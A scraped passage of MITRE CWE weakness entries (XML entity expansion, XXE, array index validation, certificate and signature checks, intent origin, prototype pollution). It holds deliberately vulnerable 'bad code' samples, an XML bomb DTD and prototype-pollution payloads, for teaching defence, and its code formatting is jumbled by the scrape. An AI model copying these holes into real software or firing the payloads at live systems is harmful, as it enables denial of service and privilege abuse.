if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) { }isValidUser = AuthenticateUser(username, password); }count++; if (isValidUser) { return(SUCCESS); }else { return(FAIL); }Example 5 Consider this example from a real-world attack against the iPhone [REF-1218]. An attacker can use brute force methods; each time there is a failed guess, the attacker quickly cuts the power before the failed entry is recorded, effectively bypassing the intended limit on the number of failed authentication attempts. Note that this attack requires removal of the cell phone battery and connecting directly to the phone's power source, and the brute force attack is still time-consuming. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.
If the DTD contains a large number of nested or recursive entities, this can lead to explosive growth of data when parsed, causing a denial of service.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected. (attack code)
Example Language: XML
<?xml version="1.0"?>
<!DOCTYPE MaliciousDTD [ <!ENTITY ZERO "A"> <!ENTITY ONE "&ZERO;&ZERO;"> <!ENTITY TWO "&ONE;&ONE;"> ... <!ENTITY THIRTYTWO "&THIRTYONE;&THIRTYONE;"> ]> <data>&THIRTYTWO;</data> Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1021: Improper Restriction of Rendered UI Layers or Frames
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.
A web application is expected to place restrictions on whether it is allowed to be rendered within frames, iframes, objects, embed or applet elements. Without the restrictions, users can be tricked into interacting with the application when they were not intending to.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-611: Improper Restriction of XML External Entity Reference
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the "Server" portion of the SSRF acronym does not necessarily apply.
CWE-129: Improper Validation of Array Index
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the code snippet below, an untrusted integer value is used to reference an object in an array. (bad code)
Example Language: Java
public String getValue(int index) {
return array[index]; }If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised. Example 2 The following example takes a user-supplied value to allocate an array of objects and then operates on the array. (bad code)
Example Language: Java
private void buildList ( int untrustedListSize ){
if ( 0 > untrustedListSize ){ }die("Negative value supplied for list size, die evil hacker!"); }Widget[] list = new Widget [ untrustedListSize ]; list[0] = new Widget(); This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown. Example 3 In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method (bad code)
Example Language: C
int getValueFromArray(int *array, int len, int index) {
int value; // check that the array index is less than the maximum // length of the array if (index < len) {
// get the value at the specified index of the array
value = array[index]; // if array index is invalid then output error message // and return value indicating error else { printf("Value is: %d\n", array[index]); }value = -1; return value; However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in reading data before the beginning of the buffer (CWE-127) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. (good code)
Example Language: C
... // check that the array index is within the correct // range of values for the array if (index >= 0 && index < len) { ... Example 4 The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index. (bad code)
Example Language: C
/* capture the sizes of all messages */ int getsizes(int sock, int count, int *sizes) { ...
char buf[BUFFER_SIZE]; int ok; int num, size; // read values from socket and added to sizes array while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0) {
// continue read from socket until buf only contains '.'
if (DOTLINE(buf)) break;
else if (sscanf(buf, "%d %d", &num, &size) == 2)sizes[num - 1] = size;
...
In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. (good code)
Example Language: C
/* capture the sizes of all messages */ int getsizes(int sock, int count, int *sizes) { ...
char buf[BUFFER_SIZE]; int ok; int num, size; // read values from socket and added to sizes array while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0) { // continue read from socket until buf only contains '.' if (DOTLINE(buf)) break;
else if (sscanf(buf, "%d %d", &num, &size) == 2) { if (num > 0 && num <= (unsigned)count)
sizes[num - 1] = size;
else /* warn about possible attempt to induce buffer overflow */ report(stderr, "Warning: ignoring bogus data for message sizes returned by server.\n"); ...
Example 5 In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index. (bad code)
Example Language: Java
// Method called from servlet to obtain product information public String displayProductSummary(int index) { String productSummary = new String("");
try { String productSummary = getProductSummary(index);
} catch (Exception ex) {...} return productSummary; public String getProductSummary(int index) { return products[index]; }In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. (good code)
Example Language: Java
// Method called from servlet to obtain product information public String displayProductSummary(int index) { String productSummary = new String("");
try { String productSummary = getProductSummary(index);
} catch (Exception ex) {...} return productSummary; public String getProductSummary(int index) { String productSummary = "";
if ((index >= 0) && (index < MAX_PRODUCTS)) { productSummary = products[index]; }else { System.err.println("index is out of bounds"); }throw new IndexOutOfBoundsException(); return productSummary; An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds. (good code)
Example Language: Java
ArrayList productArray = new ArrayList(MAX_PRODUCTS);
... try { productSummary = (String) productArray.get(index); } catch (IndexOutOfBoundsException ex) {...}Example 6 The following example asks a user for an offset into an array to select an item. (bad code)
Example Language: C
int main (int argc, char **argv) { char *items[] = {"boat", "car", "truck", "train"}; }int index = GetUntrustedOffset(); printf("You selected %s\n", items[index-1]); The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This weakness can precede uncontrolled memory allocation (CWE-789) in languages that automatically expand an array when an index is used that is larger than the size of the array, such as JavaScript.
Theoretical
An improperly validated array index might lead directly to the always-incorrect behavior of "access of array using out-of-bounds index."
CWE-298: Improper Validation of Certificate Expiration
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age.
When the expiration of a certificate is not taken into account, no trust has necessarily been conveyed through it. Therefore, the validity of the certificate cannot be verified and all benefit of the certificate is lost.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates. (bad code)
Example Language: C
if (cert = SSL_get_peer(certificate(ssl)) {
foo=SSL_get_verify_result(ssl);
if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo)) //do stuff If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-297: Improper Validation of Certificate with Host Mismatch
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product communicates with a host that provides a certificate, but the product does not properly ensure that the certificate is actually associated with that host.
Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the product is interacting with. If the certificate's host-specific data is not properly checked - such as the Common Name (CN) in the Subject or the Subject Alternative Name (SAN) extension of an X.509 certificate - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed. Even if the product attempts to check the hostname, it is still possible to incorrectly check the hostname. For example, attackers could create a certificate with a name that begins with a trusted name followed by a NUL byte, which could cause some string-based comparisons to only examine the portion that contains the trusted name. This weakness can occur even when the product uses Certificate Pinning, if the product does not verify the hostname at the time a certificate is pinned. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following OpenSSL code obtains a certificate and verifies it. (bad code)
Example Language: C
cert = SSL_get_peer_certificate(ssl);
if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) { // do secret things Even though the "verify" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-347: Improper Verification of Cryptographic Signature
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following code, a JarFile object is created from a downloaded file. (bad code)
Example Language: Java
File f = new File(downloadedFilePath);
JarFile jf = new JarFile(f); The JAR file that was potentially downloaded from an untrusted source is created without verifying the signature (if present). An alternate constructor that accepts a boolean verify parameter should be used instead. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-940: Improper Verification of Source of a Communication Channel
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.
When an attacker can successfully establish a communication channel from an untrusted origin, the attacker may be able to gain privileges and access unexpected functionality.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This Android application will remove a user account when it receives an intent to do so: (bad code)
Example Language: Java
IntentFilter filter = new IntentFilter("com.example.RemoveUser");
MyReceiver receiver = new MyReceiver(); registerReceiver(receiver, filter); public class DeleteReceiver extends BroadcastReceiver { @Override }public void onReceive(Context context, Intent intent) { int userID = intent.getIntExtra("userID"); }destroyUserData(userID); This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file. Example 2 These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: (bad code)
Example Language: Java
// Android
@Override public boolean shouldOverrideUrlLoading(WebView view, String url){ if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){
if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){ }writeDataToView(view, UserData); }return false; else{ return true; }(bad code)
Example Language: Objective-C
// iOS
-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType { NSURL *URL = [exRequest URL];
if ([[URL scheme] isEqualToString:@"exampleScheme"]) { NSString *functionString = [URL resourceSpecifier];
if ([functionString hasPrefix:@"specialFunction"]) { // Make data available back in webview. UIWebView *webView = [self writeDataToView:[URL query]]; return NO; return YES; A call into native code can then be initiated by passing parameters within the URL: (attack code)
Example Language: JavaScript
window.location = examplescheme://method?parameter=value
Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
While many access control issues involve authenticating the user, this weakness is more about authenticating the actual source of the communication channel itself; there might not be any "user" in such cases.
CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.
If the object contains attributes that were only intended for internal use, then their unexpected modification could lead to a vulnerability. This weakness is sometimes known by the language-specific mechanisms that make it possible, such as mass assignment, autobinding, or object injection.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This function sets object attributes based on a dot-separated path. (bad code)
Example Language: JavaScript
function setValueByPath (object, path, value) {
const pathArray = path.split(".");
const attributeToSet = pathArray.pop(); let objectToModify = object; for (const attr of pathArray) { if (typeof objectToModify[attr] !== 'object') { objectToModify[attr] = {}; } objectToModify = objectToModify[attr]; } objectToModify[attributeToSet] = value; return object; } This function does not check if the attribute resolves to the object prototype. These codes can be used to add "isAdmin: true" to the object prototype. (bad code)
Example Language: JavaScript
setValueByPath({}, "__proto__.isAdmin", true)
setValueByPath({}, "constructor.prototype.isAdmin", true) By using a denylist of dangerous attributes, this weakness can be eliminated. (good code)
Example Language: JavaScript
function setValueByPath (object, path, value) {
const pathArray = path.split(".");
const attributeToSet = pathArray.pop(); let objectToModify = object; for (const attr of pathArray) {
// Ignore attributes which resolve to object prototype
objectToModify[attributeToSet] = value;if (attr === "__proto__" || attr === "constructor" || attr === "prototype") {
continue;
if (typeof objectToModify[attr] !== "object") {}
objectToModify[attr] = {};
objectToModify = objectToModify[attr];} } return object; } Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-326: Inadequate Encryption Strength
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.
A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
